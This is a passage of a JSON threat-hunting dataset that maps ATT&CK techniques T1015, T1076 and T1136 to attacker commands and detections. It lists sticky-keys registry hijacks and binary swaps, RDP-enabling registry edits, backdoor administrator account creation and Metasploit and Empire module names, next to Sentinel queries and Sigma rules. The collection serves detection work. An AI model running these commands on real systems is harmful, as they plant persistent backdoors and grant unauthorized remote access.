"https://www.justice.gov/file/1080281/download", + "https://thehackernews.com/2018/06/chinese-watering-hole-attack.html", + "https://www.brighttalk.com/webcast/10703/296317/apt34-new-targeted-attack-in-the-middle-east", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/", + "https://citizenlab.org/2016/08/group5-syria/", + "http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong", + "https://asert.arbornetworks.com/stolen-pencil-campaign-targets-academia/", + "https://securelist.com/luckymouse-hits-national-data-center/86083/", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf", + "https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage", + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ], + [ + "https://developer.apple.com/library/archive/documentation/DeviceDrivers/Conceptual/IOKitFundamentals/Features/Features.html", + "https://docs.microsoft.com/en-us/windows-hardware/drivers/gettingstarted/user-mode-and-kernel-mode" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "Persistence:", + "command_list": [], + "commands": [], + "parsed_datasets": [ + { + "Category": "Persistence:", + "Built-in Windows Command": "", + "Cobalt Strike": "", + "Metasploit": "", + "Description": "" + } + ], + "queries": [], + "possible_detections": [], + "external_reference": [] + }, + { + "technique_id": "T1015", + "command_list": [ + "Sticky Keys Persistence via Registry Manipulations:\nREG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\" /v Debugger /t REG_SZ /d \"C:\\windows\\system32\\cmd.exe\" /f", + "Sticky Keys Persistence via Registry Manipulations:\nshell REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\" /v Debugger /t REG_SZ /d \"C:\\windows\\system32\\cmd.exe\" /f", + "post/windows/manage/sticky_keys", + "Sticky Keys Persistence via binary swapping:\ntakeown.exe C:\\Windows\\system32\\sethc.exe\ndel C:\\Windows\\system32\\sethc.exe\ncopy C:\\Windows\\system32\\cmd.exe C:\\Windows\\system32\\sethc.exe", + "Sticky Keys Persistence via binary swapping:\nshell takeown.exe C:\\Windows\\system32\\sethc.exe\nshell del C:\\Windows\\system32\\sethc.exe\nshell copy C:\\Windows\\system32\\cmd.exe C:\\Windows\\system32\\sethc.exe", + "cmd.exe reg add", + "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\osk.exe /v \"Debugger\" /t REG_SZ /d \"C:\\windows\\system32\\cmd.exe\" /f", + "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe /t REG_SZ /v Debugger /d \"C:\\windows\\system32\\cmd.exe\" /f", + "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe /t REG_SZ /v Debugger /d \"C:\\windows\\system32\\cmd.exe\" /f", + "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\magnify.exe /t REG_SZ /v Debugger /d \"C:\\windows\\system32\\cmd.exe\" /f", + "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\narrator.exe /t REG_SZ /v Debugger /d \"C:\\windows\\system32\\cmd.exe\" /f", + "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\DisplaySwitch.exe /t REG_SZ /v Debugger /d \"C:\\windows\\system32\\cmd.exe\" /f", + "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\AtBroker.exe /t REG_SZ /v Debugger /d \"C:\\windows\\system32\\cmd.exe\" /f", + "powershell/lateral_movement/invoke_wmi_debugger", + "powershell/persistence/misc/debugger" + ], + "commands": [ + { + "command": "Sticky Keys Persistence via Registry Manipulations:\nREG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\" /v Debugger /t REG_SZ /d \"C:\\windows\\system32\\cmd.exe\" /f", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Built-in Windows Command" + }, + { + "command": "Sticky Keys Persistence via Registry Manipulations:\nshell REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\" /v Debugger /t REG_SZ /d \"C:\\windows\\system32\\cmd.exe\" /f", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Cobalt Strike" + }, + { + "command": "post/windows/manage/sticky_keys", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Metasploit" + }, + { + "command": "Sticky Keys Persistence via binary swapping:\ntakeown.exe C:\\Windows\\system32\\sethc.exe\ndel C:\\Windows\\system32\\sethc.exe\ncopy C:\\Windows\\system32\\cmd.exe C:\\Windows\\system32\\sethc.exe", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Built-in Windows Command" + }, + { + "command": "Sticky Keys Persistence via binary swapping:\nshell takeown.exe C:\\Windows\\system32\\sethc.exe\nshell del C:\\Windows\\system32\\sethc.exe\nshell copy C:\\Windows\\system32\\cmd.exe C:\\Windows\\system32\\sethc.exe", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Cobalt Strike" + }, + { + "command": "cmd.exe reg add", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\osk.exe /v \"Debugger\" /t REG_SZ /d \"C:\\windows\\system32\\cmd.exe\" /f", + "source": "Threat Hunting Tables", + "name": "registry_path" + }, + { + "command": "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe /t REG_SZ /v Debugger /d \"C:\\windows\\system32\\cmd.exe\" /f", + "source": "Threat Hunting Tables", + "name": "registry_path" + }, + { + "command": "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe /t REG_SZ /v Debugger /d \"C:\\windows\\system32\\cmd.exe\" /f", + "source": "Threat Hunting Tables", + "name": "registry_path" + }, + { + "command": "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\magnify.exe /t REG_SZ /v Debugger /d \"C:\\windows\\system32\\cmd.exe\" /f", + "source": "Threat Hunting Tables", + "name": "registry_path" + }, + { + "command": "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\narrator.exe /t REG_SZ /v Debugger /d \"C:\\windows\\system32\\cmd.exe\" /f", + "source": "Threat Hunting Tables", + "name": "registry_path" + }, + { + "command": "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\DisplaySwitch.exe /t REG_SZ /v Debugger /d \"C:\\windows\\system32\\cmd.exe\" /f", + "source": "Threat Hunting Tables", + "name": "registry_path" + }, + { + "command": "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\AtBroker.exe /t REG_SZ /v Debugger /d \"C:\\windows\\system32\\cmd.exe\" /f", + "source": "Threat Hunting Tables", + "name": "registry_path" + }, + { + "command": "powershell/lateral_movement/invoke_wmi_debugger", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/persistence/misc/debugger", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "Category": "T1015", + "Built-in Windows Command": "Sticky Keys Persistence via Registry Manipulations:\nREG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\" /v Debugger /t REG_SZ /d \"C:\\windows\\system32\\cmd.exe\" /f", + "Cobalt Strike": "Sticky Keys Persistence via Registry Manipulations:\nshell REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\" /v Debugger /t REG_SZ /d \"C:\\windows\\system32\\cmd.exe\" /f", + "Metasploit": "post/windows/manage/sticky_keys", + "Description": "Modify the registry to point the sethc.exe file to point to cmd.exe" + }, + { + "Category": "T1015", + "Built-in Windows Command": "Sticky Keys Persistence via binary swapping:\ntakeown.exe C:\\Windows\\system32\\sethc.exe\ndel C:\\Windows\\system32\\sethc.exe\ncopy C:\\Windows\\system32\\cmd.exe C:\\Windows\\system32\\sethc.exe", + "Cobalt Strike": "Sticky Keys Persistence via binary swapping:\nshell takeown.exe C:\\Windows\\system32\\sethc.exe\nshell del C:\\Windows\\system32\\sethc.exe\nshell copy C:\\Windows\\system32\\cmd.exe C:\\Windows\\system32\\sethc.exe", + "Metasploit": "", + "Description": "Remove the real sethc.exe and replace it with a copy of cmd.exe. You can also just move the original sethc.exe to a different file if you don't want to delete it" + }, + { + "chain_id": "100175", + "os": "windows", + "parent_process": "cmd.exe", + "commandline_string": "reg add", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\osk.exe /v \"Debugger\" /t REG_SZ /d \"C:\\windows\\system32\\cmd.exe\" /f", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "accessibity_features", + "mitre_attack": "T1015", + "itw_sample": "" + }, + { + "chain_id": "100176", + "os": "windows", + "parent_process": "cmd.exe", + "commandline_string": "reg add", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe /t REG_SZ /v Debugger /d \"C:\\windows\\system32\\cmd.exe\" /f", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "accessibity_features", + "mitre_attack": "T1015", + "itw_sample": "" + }, + { + "chain_id": "100177", + "os": "windows", + "parent_process": "cmd.exe", + "commandline_string": "reg add", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe /t REG_SZ /v Debugger /d \"C:\\windows\\system32\\cmd.exe\" /f", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "accessibity_features", + "mitre_attack": "T1015", + "itw_sample": "" + }, + { + "chain_id": "100178", + "os": "windows", + "parent_process": "cmd.exe", + "commandline_string": "reg add", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\magnify.exe /t REG_SZ /v Debugger /d \"C:\\windows\\system32\\cmd.exe\" /f", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "accessibity_features", + "mitre_attack": "T1015", + "itw_sample": "" + }, + { + "chain_id": "100179", + "os": "windows", + "parent_process": "cmd.exe", + "commandline_string": "reg add", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\narrator.exe /t REG_SZ /v Debugger /d \"C:\\windows\\system32\\cmd.exe\" /f", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "accessibity_features", + "mitre_attack": "T1015", + "itw_sample": "" + }, + { + "chain_id": "100180", + "os": "windows", + "parent_process": "cmd.exe", + "commandline_string": "reg add", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\DisplaySwitch.exe /t REG_SZ /v Debugger /d \"C:\\windows\\system32\\cmd.exe\" /f", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "accessibity_features", + "mitre_attack": "T1015", + "itw_sample": "" + }, + { + "chain_id": "100181", + "os": "windows", + "parent_process": "cmd.exe", + "commandline_string": "reg add", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\AtBroker.exe /t REG_SZ /v Debugger /d \"C:\\windows\\system32\\cmd.exe\" /f", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "accessibity_features", + "mitre_attack": "T1015", + "itw_sample": "" + }, + { + "Empire Module": "powershell/lateral_movement/invoke_wmi_debugger", + "ATT&CK Technique #1": "T1015", + "ATT&CK Technique #2": "", + "Technique": "Accessibility Features", + "Concatenate for Python Dictionary": "\"powershell/lateral_movement/invoke_wmi_debugger\": [\"T1015\"]," + }, + { + "Empire Module": "powershell/persistence/misc/debugger", + "ATT&CK Technique #1": "T1015", + "ATT&CK Technique #2": "", + "Technique": "Accessibility Features", + "Concatenate for Python Dictionary": "\"powershell/persistence/misc/debugger\": [\"T1015\"]," + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1 and process_parent_path contains\"winlogon.exe\"and (process_path contains \"sethc.exe\"or process_path contains \"utilman.exe\"or process_path contains \"osk.exe\"or process_path contains \"magnify.exe\"or process_path contains \"displayswitch.exe\"or process_path contains \"narrator.exe\"or process_path contains \"atbroker.exe\")", + "name": "Accessibility Features" + }, + { + "product": "Azure Sentinel", + "query": "Sysmon| where (EventID == 12 or EventID == 13 or EventID == 14) and registry_key_path contains \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*\"", + "name": "Accessibility Features Registry" + } + ], + "possible_detections": [ + { + "action": "global", + "title": "Sticky Key Like Backdoor Usage", + "id": "baca5663-583c-45f9-b5dc-ea96a22ce542", + "description": "Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen", + "references": [ + "https://blogs.technet.microsoft.com/jonathantrull/2016/10/03/detecting-sticky-key-backdoors/" + ], + "tags": [ + "attack.privilege_escalation", + "attack.persistence", + "attack.t1015", + "car.2014-11-003", + "car.2014-11-008" + ], + "author": "Florian Roth, @twjackomo", + "date": "2018/03/15", + "detection": { + "condition": "1 of them" + }, + "falsepositives": [ + "Unlikely" + ], + "level": "critical" + }, + { + "logsource": { + "product": "windows", + "service": "sysmon" + }, + "detection": { + "selection_registry": { + "EventID": 13, + "TargetObject": [ + "*\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\\Debugger", + "*\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe\\Debugger", + "*\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\osk.exe\\Debugger", + "*\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Magnify.exe\\Debugger", + "*\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Narrator.exe\\Debugger", + "*\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\DisplaySwitch.exe\\Debugger" + ], + "EventType": "SetValue" + } + } + }, + { + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection_process": { + "ParentImage": [ + "*\\winlogon.exe" + ], + "CommandLine": [ + "*cmd.exe sethc.exe *", + "*cmd.exe utilman.exe *", + "*cmd.exe osk.exe *", + "*cmd.exe Magnify.exe *", + "*cmd.exe Narrator.exe *", + "*cmd.exe DisplaySwitch.exe *" + ] + } + } + }, + { + "title": "Suspicious Debugger Registration Cmdline", + "id": "ae215552-081e-44c7-805f-be16f975c8a2", + "status": "experimental", + "description": "Detects the registration of a debugger for a program that is available in the logon screen (sticky key backdoor).", + "references": [ + "https://blogs.technet.microsoft.com/jonathantrull/2016/10/03/detecting-sticky-key-backdoors/" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1015" + ], + "author": "Florian Roth", + "date": "2019/09/06", + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "CommandLine": [ + "*\\CurrentVersion\\Image File Execution Options\\sethc.exe*", + "*\\CurrentVersion\\Image File Execution Options\\utilman.exe*", + "*\\CurrentVersion\\Image File Execution Options\\osk.exe*", + "*\\CurrentVersion\\Image File Execution Options\\magnify.exe*", + "*\\CurrentVersion\\Image File Execution Options\\narrator.exe*", + "*\\CurrentVersion\\Image File Execution Options\\displayswitch.exe*" + ] + }, + "condition": "selection" + }, + "falsepositives": [ + "Penetration Tests" + ], + "level": "high" + }, + [ + "4688", + "Process Execution" + ], + [ + "4657", + "Windows Registry" + ], + [ + "4663", + "File monitoring" + ], + [ + "AutoRuns" + ], + [ + "4688", + "Process Execution" + ], + [ + "LOG-MD", + "AutoRuns" + ], + [ + "4657", + "Windows Registry" + ], + [ + "4663", + "File monitoring" + ] + ], + "external_reference": [ + "http://www.slideshare.net/MatthewDunwoody1/no-easy-breach-derby-con-2016", + "https://www.emc.com/collateral/white-papers/h12756-wp-shell-crew.pdf", + "http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf", + "http://carnal0wnage.attackresearch.com/2012/09/more-on-aptsim.html", + "https://www.fireeye.com/blog/threat-research/2017/03/apt29_domain_frontin.html" + ] + }, + { + "technique_id": "T1076", + "command_list": [ + "Enable RDP Services:\nREG ADD \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" /v UserAuthentication /t REG_DWORD /d 0 /f\nreg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f \nnet start TermService", + "Enable RDP Services:\nshell REG ADD \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" /v UserAuthentication /t REG_DWORD /d 0 /f\nshell reg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f \nshell net start TermService", + "post/windows/manage/enable_rdp", + "mstsc.exe|tscon.exe", + "powershell/management/enable_multi_rdp", + "powershell/management/enable_rdp" + ], + "commands": [ + { + "command": "Enable RDP Services:\nREG ADD \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" /v UserAuthentication /t REG_DWORD /d 0 /f\nreg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f \nnet start TermService", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Built-in Windows Command" + }, + { + "command": "Enable RDP Services:\nshell REG ADD \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" /v UserAuthentication /t REG_DWORD /d 0 /f\nshell reg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f \nshell net start TermService", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Cobalt Strike" + }, + { + "command": "post/windows/manage/enable_rdp", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Metasploit" + }, + { + "command": "mstsc.exe|tscon.exe", + "source": "SysmonHunter - Remote Desktop Protocol", + "name": "" + }, + { + "command": "powershell/management/enable_multi_rdp", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/management/enable_rdp", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "Category": "T1076", + "Built-in Windows Command": "Enable RDP Services:\nREG ADD \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" /v UserAuthentication /t REG_DWORD /d 0 /f\nreg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f \nnet start TermService", + "Cobalt Strike": "Enable RDP Services:\nshell REG ADD \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" /v UserAuthentication /t REG_DWORD /d 0 /f\nshell reg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f \nshell net start TermService", + "Metasploit": "post/windows/manage/enable_rdp", + "Description": "Enable RDP via the registry and services" + }, + { + "name": "Remote Desktop Protocol", + "description": null, + "level": "medium", + "phase": "Lateral Movement", + "query": [ + { + "type": "process", + "process": { + "any": { + "pattern": "mstsc.exe|tscon.exe" + } + } + } + ] + }, + { + "Empire Module": "powershell/management/enable_multi_rdp", + "ATT&CK Technique #1": "T1076", + "ATT&CK Technique #2": "T1043", + "Technique": "Remote Desktop Protocol", + "Concatenate for Python Dictionary": "\"powershell/management/enable_multi_rdp\": [\"T1076\",\"T1043\"]," + }, + { + "Empire Module": "powershell/management/enable_rdp", + "ATT&CK Technique #1": "T1076", + "ATT&CK Technique #2": "", + "Technique": "Remote Desktop Protocol", + "Concatenate for Python Dictionary": "\"powershell/management/enable_rdp\": [\"T1076\"]," + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1 and(process_path contains \"tscon.exe\"or process_path contains \"mstsc.exe\")", + "name": "Remote Desktop Protocol Process" + }, + { + "product": "Azure Sentinel", + "query": "Sysmon| where (EventID == 12 or EventID == 13 or EventID == 14)and (process_path contains \"LogonUI.exe\"or registry_key_path contains \"\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal Services\\\\\")", + "name": "Remote Desktop Protocol Registry" + } + ], + "possible_detections": [ + { + "title": "RDP over Reverse SSH Tunnel", + "id": "5f699bc5-5446-4a4a-a0b7-5ef2885a3eb4", + "status": "experimental", + "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address and on TCP port 3389", + "references": [ + "https://twitter.com/SBousseaden/status/1096148422984384514" + ], + "author": "Samir Bousseaden", + "date": "2019/02/16", + "tags": [ + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1076", + "car.2013-07-002" + ], + "logsource": { + "product": "windows", + "service": "sysmon" + }, + "detection": { + "selection": { + "EventID": 3, + "Image": "*\\svchost.exe", + "Initiated": "true", + "SourcePort": 3389, + "DestinationIp": [ + "127.*", + "::1" + ] + }, + "condition": "selection" + }, + "falsepositives": [ + "unknown" + ], + "level": "high" + }, + { + "title": "RDP Login from localhost", + "id": "51e33403-2a37-4d66-a574-1fda1782cc31", + "description": "RDP login with localhost source address may be a tunnelled login", + "references": [ + "https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html" + ], + "date": "2019/01/28", + "modified": "2019/01/29", + "tags": [ + "attack.lateral_movement", + "attack.t1076", + "car.2013-07-002" + ], + "status": "experimental", + "author": "Thomas Patzke", + "logsource": { + "product": "windows", + "service": "security" + }, + "detection": { + "selection": { + "EventID": 4624, + "LogonType": 10, + "SourceNetworkAddress": [ + "::1", + "127.0.0.1" + ] + }, + "condition": "selection" + }, + "falsepositives": [ + "Unknown" + ], + "level": "high" + }, + { + "title": "RDP over Reverse SSH Tunnel WFP", + "id": "5bed80b6-b3e8-428e-a3ae-d3c757589e41", + "status": "experimental", + "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address and on TCP port 3389", + "references": [ + "https://twitter.com/SBousseaden/status/1096148422984384514" + ], + "author": "Samir Bousseaden", + "date": "2019/02/16", + "tags": [ + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1076", + "car.2013-07-002" + ], + "logsource": { + "product": "windows", + "service": "security" + }, + "detection": { + "selection": { + "EventID": 5156 + }, + "sourceRDP": { + "SourcePort": 3389, + "DestinationAddress": [ + "127.*", + "::1" + ] + }, + "destinationRDP": { + "DestinationPort": 3389, + "SourceAddress": [ + "127.*", + "::1" + ] + }, + "condition": "selection and ( sourceRDP or destinationRDP )" + }, + "falsepositives": [ + "unknown" + ], + "level": "high" + }, + { + "title": "Suspicious RDP Redirect Using TSCON", + "id": "f72aa3e8-49f9-4c7d-bd74-f8ab84ff9bbb", + "status": "experimental", + "description": "Detects a suspicious RDP session redirect using tscon.exe", + "references": [ + "http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html", + "https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6" + ], + "tags": [ + "attack.lateral_movement", + "attack.privilege_escalation", + "attack.t1076", + "car.2013-07-002" + ], + "author": "Florian Roth", + "date": "2018/03/17", + "modified": "2018/12/11", + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "CommandLine": "* /dest:rdp-tcp:*" + }, + "condition": "selection" + }, + "falsepositives": [ + "Unknown" + ], + "level": "high" + }, + [ + "4688", + "Process Execution" + ], + [ + "4624", + "Authentication logs" + ], + [ + "Netflow/Enclave netflow" + ], + [ + "4688", + "Process Execution" + ], + [ + "4624", + "Authentication logs" + ], + [ + "Netflow/Enclave netflow" + ] + ], + "external_reference": [ + "https://www.fireeye.com/blog/threat-research/2014/05/the-pla-and-the-800am-500pm-work-day-fireeye-confirms-dojs-findings-on-apt1-intrusion-activity.html", + "https://www.justice.gov/opa/press-release/file/1121706/download", + "https://www.brighttalk.com/webcast/10703/296317/apt34-new-targeted-attack-in-the-middle-east", + "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf", + "https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin10.pdf", + "https://s3-us-west-2.amazonaws.com/cymmetria-blog/public/Unveiling_Patchwork.pdf", + "https://www.us-cert.gov/ncas/alerts/TA17-293A", + "https://pan-unit42.github.io/playbook_viewer/", + "https://www2.fireeye.com/WBNR-Know-Your-Enemy-UNC622-Spear-Phishing.html", + "http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf", + "https://www.group-ib.com/blog/cobalt", + "https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html", + "https://www.fireeye.com/blog/threat-research/2019/03/apt40-examining-a-china-nexus-espionage-actor.html", + "https://asert.arbornetworks.com/stolen-pencil-campaign-targets-academia/", + "https://www.fireeye.com/blog/threat-research/2019/04/triton-actor-ttp-profile-custom-attack-tools-detections.html", + "http://carnal0wnage.attackresearch.com/2012/09/more-on-aptsim.html", + "https://www.us-cert.gov/ncas/alerts/TA18-074A", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-RAT-and-Staging-Report.pdf", + "https://www.fireeye.com/blog/threat-research/2019/01/apt39-iranian-cyber-espionage-group-focused-on-personal-information.html", + "https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf" + ] + }, + { + "technique_id": "T1136", + "command_list": [ + "Add backdoor user account:\nnet user support_388945a0 somepasswordhere /add /y\nnet localgroup administrators support_388945a0 /add\nnet localgroup \"remote desktop users\" support_388945a0 /add", + "Add backdoor user account:\nshell net user support_388945a0 somepasswordhere /add /y\nshell net localgroup administrators support_388945a0 /add\nshell net localgroup \"remote desktop users\" support_388945a0 /add", + "post/windows/manage/add_user_domain", + "Enable backdoor user account:\nnet user support_388945a0 /active:yes\nnet localgroup administrators support_388945a0 /add\nnet localgroup \"remote desktop users\" support_388945a0 /add", + "Enable backdoor user account:\nshell net user support_388945a0 /active:yes\nshell net localgroup administrators support_388945a0 /add\nshell net localgroup \"remote desktop users\" support_388945a0 /add", + "Net.exe user /add", + "Net.exe localgroup administrators * /add", + "Net.exe user * \\password \\domain", + "Net.exe dsadd user", + "powershell/persistence/misc/add_netuser", + "powershell/privesc/powerup/service_useradd", + "useradd -M -N -r -s /bin/bash -c \"#{comment}\" #{username}", + "useradd -o -u 0 -g 0 -M -d /root -s /bin/bash #{username}" + ], + "commands": [ + { + "command": "Add backdoor user account:\nnet user support_388945a0 somepasswordhere /add /y\nnet localgroup administrators support_388945a0 /add\nnet localgroup \"remote desktop users\" support_388945a0 /add", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Built-in Windows Command" + }, + { + "command": "Add backdoor user account:\nshell net user support_388945a0 somepasswordhere /add /y\nshell net localgroup administrators support_388945a0 /add\nshell net localgroup \"remote desktop users\" support_388945a0 /add", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Cobalt Strike" + }, + { + "command": "post/windows/manage/add_user_domain", + "source": 